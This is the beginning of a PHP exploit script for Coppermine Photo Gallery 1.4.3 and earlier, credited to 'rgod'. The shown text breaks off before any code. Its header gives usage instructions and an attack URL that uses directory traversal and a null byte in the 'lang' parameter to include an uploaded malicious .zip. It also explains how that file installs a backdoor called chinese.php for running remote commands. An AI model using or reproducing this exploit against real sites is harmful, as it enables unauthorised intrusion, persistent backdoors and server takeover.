1 <?php
2 # −−−cpg_143_incl_xpl.php 15.38 04/12/2005 #
3 # #
4 # Coppermine Photo Gallery <= 1.4.3 remote commands execution #
5 # coded by rgod #
6 # site: http://retrogod.altervista.org #
7 # #
8 # −> this works regardless of any php.ini settings, you need a normal user #
9 # account with upload rights in personal albums and at least one album #
10 # #
11 # usage: launch from Apache, fill in requested fields, then go! #
12 # #
13 # Sun−Tzu: "The direct and the indirect lead on to each other in turn. It is #
14 # like moving in a circle−−you never come to an end. Who can exhaust the #
15 # possibilities of their combination?" #
16
17 /* a short explaination: arbitrary local inclusion issue in "lang"
18 argument in init.inc.php , ex.:
19
20 http://[target]/[path]/thumbnails.php?lang=../album/userpics/10002/shell.zip%00
21 (by a null char, regardless of magic_quotes_gpc settings, because of
22 Coppermine magic quotes disable code)
23
24 we need to upload a malicious .zip file with php code inside in a personal
25 album folder (no check on file contempt) and to include it (cycling inside
26 folders we will search for it − a subfolder is created in album/userpics/ dir,
27 it is numbered like this: 10000 + db userid).
28 We don’t see any ouput including it, so the .zip file install a backdoor
29 called chinese.php inside Coppermine lang/ dir. Modify the .zip file code
30 if you need. After first run, if succeeded, you can launch commands manually:
31
32